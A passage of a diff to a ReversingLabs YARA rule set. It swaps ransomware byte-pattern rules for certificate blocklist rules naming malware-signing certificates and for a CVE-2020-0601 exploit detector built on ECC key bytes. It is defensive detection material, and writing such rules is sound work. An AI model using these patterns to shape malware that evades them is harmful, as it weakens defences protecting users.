-            ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? 51 6A ?? FF D0 BE ?? ?? ?? ?? 85 C0 74 ?? 56 57
-            E8 ?? ?? ?? ?? 59 59 6A ?? FF D0 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 6A ?? 57
-            6A ?? FF D0 8B D8 85 DB 7D ?? 56 57 E8 ?? ?? ?? ?? 59 59 6A ?? FF D0 68 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 59 6A ?? 8D 4D ??
-            51 FF D0 6A ?? 58 66 89 45 ?? 8B 46 ?? 8B 00 8B 00 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 66
-            89 45 ?? 6A ?? 8D 45 ?? 50 53 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 8D ?? ?? ?? ?? 51 FF D0 6A ?? 50 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 53 E8
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? FF D0 5F 5E 5B C9 C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Mapping OOO" and ( pe.signatures [ i ] . serial == "00:a4:6f:9d:87:84:77:8b:aa:48:16:7c:48:bb:c5:6f:30" or pe.signatures [ i ] . serial == "a4:6f:9d:87:84:77:8b:aa:48:16:7c:48:bb:c5:6f:30" ) and 1618963200 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_525B5529Db20D17A85Be284D6B7952Ea : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "52cdf082-7212-53e6-9e55-b86153e6afe8"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L17200-L17216"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8fd406004b634e4826659b1dff88c61074fd321969b9fd63ea45d8e9608b35f1"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $encrypt_files_1 and $remote_connection_1 and $remote_connection_2 and $remote_connection_3 ) or ( $encrypt_files_2 and $encrypt_files_3 and $encrypt_files_4 and $remote_connection_4 and $remote_connection_5 ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Buster Ind Com Imp e Exp de Acessorios P Autos Ltda" and pe.signatures [ i ] . serial == "52:5b:55:29:db:20:d1:7a:85:be:28:4d:6b:79:52:ea" and 1508198400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Good : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_70Ae0E517D2Ef6D5Eed06B56730A1A9A : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Good ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e0f97200-7fe9-5811-b6cd-708ecc3a2fbc"
+		id = "98c19385-555e-5827-b03c-59645ad2a101"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L17218-L17234"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "017eed878daf706eb96b638a8d1f4428466bc1d00ce27f32628bd249a658a813"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "70:ae:0e:51:7d:2e:f6:d5:ee:d0:6b:56:73:0a:1a:9a" and 1475193600 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_57C3717C5E2Ce9A2E0Cf0340C03F458E : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "47207784-5aee-5fa3-bed9-2c12d9932c38"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L17236-L17252"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "fd710146874528c43ad8a9f847b7704c44ba4564cf79e20e6b23aa98b0ee2ea5"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Citizen Travel Ltd" and pe.signatures [ i ] . serial == "57:c3:71:7c:5e:2c:e9:a2:e0:cf:03:40:c0:3f:45:8e" and 1450915200 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_0761110Efe0B688C469D687512828C1F : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "e8575a71-124b-5040-91b1-ccad371e10da"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L17254-L17270"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0ba60e1f58c7335ba5aa261031d09ee83a0ee51e05f8f26078b2a5c776ad0add"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ENP Games Co., Ltd." and pe.signatures [ i ] . serial == "07:61:11:0e:fe:0b:68:8c:46:9d:68:75:12:82:8c:1f" and 1433721600 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_08Aa03F385F870E3A6D243B74B1Dadf6 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "64aa17fe-676d-5c6e-babc-15b5e8dc72bb"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L17272-L17288"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ef49a28a93d31c55dd2dfd3bec645f757a0a1a7eb8718ce92cf47bf9af126aed"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE4\\xB8\\x9C\\xE8\\x8E\\x9E\\xE5\\xB8\\x82\\xE8\\x85\\xBE\\xE4\\xBA\\x91\\xE8\\xAE\\xA1\\xE7\\xAE\\x97\\xE6\\x9C\\xBA\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "08:aa:03:f3:85:f8:70:e3:a6:d2:43:b7:4b:1d:ad:f6" and 1352678400 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Win32_Exploit_CVE20200601 : TC_DETECTION MALICIOUS EXPLOIT CVE_2020_0601 FILE
+{
+	meta:
+		description = "Yara rule that detects CVE-2020-0601 exploit."
+		author = "ReversingLabs"
+		id = "6a03fd5e-3b7f-5b71-b897-5cac81721a56"
 		date = "2020-07-15"
 		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Good.yara#L1-L82"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6737853a77a6008f9fd2141bb6b13d595f1cb7e832be944596f709e1fcdf8003"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/exploit/Win32.Exploit.CVE20200601.yara#L3-L253"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e4d915560ad72e0fde63276f9ffece00535c7983125efaa8298adc11d5e54817"
 		score = 75
-		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		quality = 88
+		tags = "TC_DETECTION, MALICIOUS, EXPLOIT, CVE-2020-0601, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Good"
+		category = "EXPLOIT"
+		exploit = "CVE-2020-0601"
+		tc_detection_type = "Exploit"
+		tc_detection_name = "CVE-2020-0601"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$find_files = {
-            FF D7 53 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C3 8D
-            85 ?? ?? ?? ?? 50 FF D7 53 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E
-            5B 8B E5 5D C3 8D 85 ?? ?? ?? ?? 50 FF D7 53 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C3 8D 85 ?? ?? ?? ?? 50 FF D7 53 85 C0 75 ?? 68 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C3 8D 85 ?? ?? ?? ?? 50 FF D7 53 85
-            C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C3 8B 3D ?? ?? ??
-            ?? 33 C0 66 89 45 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ??
-            ?? ?? ?? ?? FF D7 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
-            ?? 8B D8 83 FB ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            5F 5E 5B 8B E5 5D C3
+		$oid_prime_explicit = {
+            06 07 2A 86 48 CE 3D 01 01
         }
-		$remote_connection = {
-            55 8B EC 53 8B 5D ?? 57 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 7D ?? 83 C4 ?? 8B 0F 8B
-            C1 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? EB ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4F ?? 83 C4 ?? 8B C1 83 E8 ?? 74 ?? 83
-            E8 ?? 74 ?? 83 E8 ?? 74 ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ??
-            ?? ?? EB ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 68 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 47 ?? 83 C4 ?? 83 F8 ?? 77 ?? FF 24 85 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB
-            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? FF 77 ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 47 ?? 83 C4 ?? A8 ?? 74 ??
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 47 ?? 83 C4 ?? A8 ?? 74 ?? 68 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 83 7F ?? ?? 75 ?? 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 FF
-            77 ?? FF 15 ?? ?? ?? ?? 8D 04 45 ?? ?? ?? ?? 50 FF 77 ?? 56 E8 ?? ?? ?? ?? 83 C4 ??
-            8D 45 ?? 50 6A ?? 56 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 5E FF 77 ?? 53 68
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 77 ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 77 ?? 53 68
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 77 ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5B
-            5D C3
+		$ecc_public_key_1 = {
+            04 47 45 0E 96 FB 7D 5D BF E9 39 D1 21 F8 9F 0B
+            B6 D5 7B 1E 92 3A 48 59 1C F0 62 31 2D C0 7A 28
+            FE 1A A7 5C B3 B6 CC 97 E7 45 D4 58 FA D1 77 6D
+            43 A2 C0 87 65 34 0A 1F 7A DD EB 3C 33 A1 C5 9D
+            4D A4 6F 41 95 38 7F C9 1E 84 EB D1 9E 49 92 87
+            94 87 0C 3A 85 4A 66 9F 9D 59 93 4D 97 61 06 86
+            4A
         }
-		$encrypt_files = {
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B C8 8B F2 83 C4 ?? 2B CE 8D 71 ??
-            66 90 0F B7 0A 8D 52 ?? 66 89 4C 32 ?? 66 85 C9 75 ?? 50 FF 35 ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? 8B 35 ?? ?? ?? ?? 47 89 7D ?? E9 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? FF 75 ?? 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 35 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50
-            8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? EB ??
-            8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 53
-            FF D6 8B 3D ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ??
-            8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C3 53
-            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5
-            5D C3
+		$ecc_public_key_2 = {
+            04 84 13 C9 D0 BA 6D 41 7B E2 6C D0 EB 55 5F 66
+            02 1A 24 F4 5B 89 69 47 E3 B8 C2 7D F1 F2 02 C5
+            9F A0 F6 5B D5 8B 06 19 86 4F 53 10 6D 07 24 27
+            A1 A0 F8 D5 47 19 61 4C 7D CA 93 27 EA 74 0C EF
+            6F 96 09 FE 63 EC 70 5D 36 AD 67 77 AE C9 9D 7C
+            55 44 3A A2 63 51 1F F5 E3 62 D4 A9 47 07 3E CC
+            20
+        }
+		$ecc_public_key_3 = {
+            04 A7 56 7A 7C 52 DA 64 9B 0E 2D 5C D8 5E AC 92
+            3D FE 01 E6 19 4A 3D 14 03 4B FA 60 27 20 D9 83
+            89 69 FA 54 C6 9A 18 5E 55 2A 64 DE 06 F6 8D 4A
+            3B AD 10 3C 65 3D 90 88 04 89 E0 30 61 B3 AE 5D
+            01 A7 7B DE 7C B2 BE CA 65 61 00 86 AE DA 8F 7B
+            D0 89 AD 4D 1D 59 9A 41 B1 BC 47 80 DC 9E 62 C3
+            F9
+        }
+		$ecc_public_key_4 = {
+            04 CD 0F 5B 56 82 DF F0 45 1A D6 AD F7 79 F0 1D
+            C9 AC 96 D6 9E 4E 9C 1F B4 42 11 CA 86 BF 6D FB
+            85 A3 C5 E5 19 5C D7 EE A6 3F 69 67 D8 78 E2 A6
+            C9 C4 DB 2D 79 2E E7 8B 8D 02 6F 31 22 4D 06 E3
+            60 72 45 9D 0E 42 77 9E CE CF E5 7F 85 9B 18 E4
+            FC CC 2E 72 D3 16 93 4E CA 99 63 5C A1 05 2A 6C
+            06
+        }
+		$ecc_public_key_5 = {
+            04 57 CF EA B3 39 4D 3F A1 21 E0 6E 2F 38 72 C6
+            87 97 F3 85 0B 47 E7 0F 51 C8 D1 F4 99 9B CA 59
+            65 FF 4C F9 EA 0B B7 25 D5 D2 F6 EC 31 2D 32 62
+            12 D7 76 86 A7 FA 38 C9 65 D4 FE 73 E2 84 39 F8
+            4C 49 62 13 DD BA D5 88 A0 5F 3D C8 4F B0 3F 8F
+            A1 50 11 E4 93 46 AD C3 5F CB F1 A4 6A 95 56 E8
+            C0
+        }
+		$ecc_public_key_6 = {
+            04 D1 D9 4A 8E 4C 0D 84 4A 51 BA 7C EF D3 CC FA
+            3A 9A B5 A7 63 13 3D 01 E0 49 3E FA C1 47 C9 92
+            B3 3A D7 FE 6F 9C F7 9A 3A 0F F5 0E 0A 0A C3 3F
+            C8 E7 12 14 8E D5 D5 6D 98 2C B3 71 32 0A EB 2A
+            BD F6 D7 6A 20 0B 67 45 9C D2 B2 BF 53 22 66 09
+            5D DB 11 F3 F1 05 33 58 A3 E2 B8 CF 7C CD 82 9B
+            BD
+        }
+		$ecc_public_key_7 = {
+            04 4A EE 58 AE 4D CA 66 DE 06 3A A3 11 FC E0 18
+            F0 6E 1C BA 2D 30 0C 89 D9 D6 EE 9B 73 83 A9 23
+            15 8C 2F 59 8A 5A DD 14 EA 9D 59 2B 43 B7 06 EC
+            32 B6 BA EE 41 B5 AD 5D A1 85 CC EA 1D 14 66 A3
+            67 7E 46 E2 94 F3 E7 B6 56 A1 15 59 A1 4F 37 97
+            B9 22 1E BD 11 EB F4 B2 1F 5E C3 14 9A E5 D9 97
+            99
+        }
+		$ecc_public_key_8 = {
+            04 DD A7 D9 BB 8A B8 0B FB 0B 7F 21 D2 F0 BE BE
+            73 F3 33 5D 1A BC 34 EA DE C6 9B BC D0 95 F6 F0
+            CC D0 0B BA 61 5B 51 46 7E 9E 2D 9F EE 8E 63 0C
+            17 EC 07 70 F5 CF 84 2E 40 83 9C E8 3F 41 6D 3B
+            AD D3 A4 14 59 36 78 9D 03 43 EE 10 13 6C 72 DE
+            AE 88 A7 A1 6B B5 43 CE 67 DC 23 FF 03 1C A3 E2
+            3E
+        }
+		$ecc_public_key_9 = {
+            04 D7 66 B5 1B DB AE B3 60 EE 46 EA 88 63 75 3B
+            2A 94 6D F3 5F 12 F6 E3 0F 9E B6 0A 14 53 48 52
+            C8 DC 3A B3 CB 48 20 26 12 4E FA 89 84 D4 DF 91
+            E4 29 7D 28 01 D9 DB 18 43 69 A1 1F B5 D3 86 16
+            DC C7 7F 67 23 DF DF 31 31 83 03 35 70 B1 4B B7
+            C8 17 BB 51 CB DC 94 17 DB EA 09 3B 76 12 DE AA
+            B5
+        }
+		$ecc_public_key_10 = {
+            04 15 B1 E8 FD 03 15 43 E5 AC EB 87 37 11 62 EF
+            D2 83 36 52 7D 45 57 0B 4A 8D 7B 54 3B 3A 6E 5F
+            15 02 C0 50 A6 CF 25 2F 7D CA 48 B8 C7 50 63 1C
+            2A 21 08 7C 9A 36 D8 0B FE D1 26 C5 58 31 30 28
+            25 F3 5D 5D A3 B8 B6 A5 B4 92 ED 6C 2C 9F EB DD
+            43 89 A2 3C 4B 48 91 1D 50 EC 26 DF D6 60 2E BD
+            21
+        }
+		$ecc_public_key_11 = {
+            04 03 47 7B 2F 75 C9 82 15 85 FB 75 E4 91 16 D4
+            AB 62 99 F5 3E 52 0B 06 CE 41 00 7F 97 E1 0A 24
+            3C 1D 01 04 EE 3D D2 8D 09 97 0C E0 75 E4 FA FB
+            77 8A 2A F5 03 60 4B 36 8B 16 23 16 AD 09 71 F4
+            4A F4 28 50 B4 FE 88 1C 6E 3F 6C 2F 2F 09 59 5B
+            A5 5B 0B 33 99 E2 C3 3D 89 F9 6A 2C EF B2 D3 06
+            E9
+        }
+		$ecc_public_key_12 = {
+            04 92 A0 41 E8 4B 82 84 5C E2 F8 31 11 99 86 64
+            4E 09 25 2F 9D 41 2F 0A AE 35 4F 74 95 B2 51 64
+            6B 8D 6B E6 3F 70 95 F0 05 44 47 A6 72 38 50 76
+            95 02 5A 8E AE 28 9E F9 2D 4E 99 EF 2C 48 6F 4C
+            25 29 E8 D1 71 5B DF 1D C1 75 37 B4 D7 FA 7B 7A
+            42 9C 6A 0A 56 5A 7C 69 0B AA 80 09 24 6C 7E C1
+            46
+        }
+		$ecc_public_key_13 = {
+            04 A2 D5 9C 82 7B 95 9D F1 52 78 87 FE 8A 16 BF
+            05 E6 DF A3 02 4F 0D 07 C6 00 51 BA 0C 02 52 2D
+            22 A4 42 39 C4 FE 8F EA C9 C1 BE D4 4D FF 9F 7A
+            9E E2 B1 7C 9A AD A7 86 09 73 87 D1 E7 9A E3 7A
+            A5 AA 6E FB BA B3 70 C0 67 88 A2 35 D4 A3 9A B1
+            FD AD C2 EF 31 FA A8 B9 F3 FB 08 C6 91 D1 FB 29
+            95
+        }
+		$ecc_public_key_14 = {
+            04 98 E9 2F 3D 40 72 A4 ED 93 22 72 81 13 1C DD
+            10 95 F1 C5 A3 4E 71 DC 14 16 D9 0E E5 A6 05 2A
+            77 64 7B 5F 4E 38 D3 BB 1C 44 B5 7F F5 1F B6 32
+            62 5D C9 E9 84 5B 4F 30 4F 11 5A 00 FD 58 58 0C
+            A5 F5 0F 2C 4D 07 47 13 75 DA 97 97 97 6F 31 5C
+            ED 2B 9D 7B 20 3B D8 B9 54 D9 5E 99 A4 3A 51 0A
+            31
+        }
+		$ecc_public_key_15 = {
+            04 0D 30 5E 1B 15 9D 03 D0 A1 79 35 B7 3A 3C 92
+            7A CA 15 1C CD 62 F3 9C 26 5C 07 3D E5 54 FA A3
+            D6 CC 12 EA F4 14 5F E8 8E 19 AB 2F 2E 48 E6 AC
+            18 43 78 AC D0 37 C3 BD B2 CD 2C E6 47 E2 1A E6
+            63 B8 3D 2E 2F 78 C4 4F DB F4 0F A4 68 4C 55 72
+            6B 95 1D 4E 18 42 95 78 CC 37 3C 91 E2 9B 65 2B
+            29
+        }
+		$ecc_public_key_16 = {
+            04 1A AC 54 5A A9 F9 68 23 E7 7A D5 24 6F 53 C6
+            5A D8 4B AB C6 D5 B6 D1 E6 73 71 AE DD 9C D6 0C
+            61 FD DB A0 89 03 B8 05 14 EC 57 CE EE 5D 3F E2
+            21 B3 CE F7 D4 8A 79 E0 A3 83 7E 2D 97 D0 61 C4
+            F1 99 DC 25 91 63 AB 7F 30 A3 B4 70 E2 C7 A1 33
+            9C F3 BF 2E 5C 53 B1 5F B3 7D 32 7F 8A 34 E3 79
+            79
+        }
+		$ecc_public_key_17 = {
+            04 E1 FD 8E B8 43 24 AB 96 7B 85 C2 BA 0B AD 8D
+            E0 3A E3 24 B9 D2 B1 BE 88 3A CA BF 4A B8 F9 EF
+            2C 2F AF 51 50 3C 47 75 6C F8 94 B7 9B FC 28 1E
+            C5 54 CC 63 9D 16 4B 53 C1 E7 20 AB CD AC 25 D2
+            7F 8F C2 C1 5A 82 5E 30 8B 7A 54 CE 03 B5 91 7F
+            AA 94 D0 D1 8A 48 CC 82 05 26 A1 D5 51 12 D6 7B
+            36
+        }
+		$ecc_public_key_18 = {
+            04 19 E7 BC AC 44 65 ED CD B8 3F 58 FB 8D B1 57
+            A9 44 2D 05 15 F2 EF 0B FF 10 74 9F B5 62 52 5F
+            66 7E 1F E5 DC 1B 45 79 0B CC C6 53 0A 9D 8D 5D
+            02 D9 A9 59 DE 02 5A F6 95 2A 0E 8D 38 4A 8A 49
+            C6 BC C6 03 38 07 5F 55 DA 7E 09 6E E2 7F 5E D0
+            45 20 0F 59 76 10 D6 A0 24 F0 2D DE 36 F2 6C 29
+            39
+        }
+		$ecc_public_key_19 = {
+            04 B8 C6 79 D3 8F 6C 25 0E 9F 2E 39 19 1C 03 A4
+            AE 9A E5 39 07 09 16 CA 63 B1 B9 86 F8 8A 57 C1
+            57 CE 42 FA 73 A1 F7 65 42 FF 1E C1 00 B2 6E 73
+            0E FF C7 21 E5 18 A4 AA D9 71 3F A8 D4 B9 CE 8C
+            1D
+        }
+		$ecc_public_key_20 = {
+            04 C7 11 16 2A 76 1D 56 8E BE B9 62 65 D4 C3 CE
+            B4 F0 C3 30 EC 8F 6D D7 6E 39 BC C8 49 AB AB B8
+            E3 43 78 D5 81 06 5D EF C7 7D 9F CE D6 B3 90 75
+            DE 0C B0 90 DE 23 BA C8 D1 3E 67 E0 19 A9 1B 86
+            31 1E 5F 34 2D EE 17 FD 15 FB 7E 27 8A 32 A1 EA
+            C9 8F C9 7E 18 CB 2F 3B 2C 48 7A 7D A6 F4 01 07
+            AC
+        }
+		$ecc_public_key_21 = {
+            04 DE CD BB 70 20 F1 25 20 B4 94 E8 D7 B4 3B 0F
+            6E 87 DD AB AC CF 4D 40 2F 81 33 6B 59 09 18 D6
+            87 0D 26 23 9C B4 8D 95 9D 76 9F A5 B9 06 42 E6
+            AD 36 B2 C4 B3 AE 7A 3C 08 D5 CB 9D 3A 5E 45 21
+            6C 0B E3 20 F5 9B C2 DD 44 33 E3 42 B9 EA F2 28
+            42 92 AA FE 0C 07 CA 8A 13 99 3B 62 00 ED DA F3
+            35
+        }
+		$ecc_public_key_22 = {
+            04 5C D1 EE 57 0D D1 EF 81 7C 26 91 62 C3 6B E7
+            FC 73 A9 A0 C3 37 44 DC D6 F8 31 E2 77 93 5F 8F
+            EB E3 ED 38 73 F5 FC 8B 55 B9 14 A5 8F 2C 44 28
+            19 AF 5D FB DE 09 58 C9 29 B3 A9 99 D3 75 13 3C
+            A9
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $remote_connection )
+		uint16( 0 ) == 0x5A4D and ( $oid_prime_explicit ) and ( any of ( $ecc_public_key_* ) ) and ( pe.number_of_signatures > 0 )
 }
-rule REVERSINGLABS_Win32_Ransomware_Satana : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Win32_Virus_Elerad : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects Satana ransomware."
+		description = "Yara rule that detects Elerad virus."
 		author = "ReversingLabs"
-		id = "8dc5bf7c-d4cb-5961-804b-035676dacbc0"
+		id = "0307a136-ea2c-584c-bfda-f41e2c46fd09"
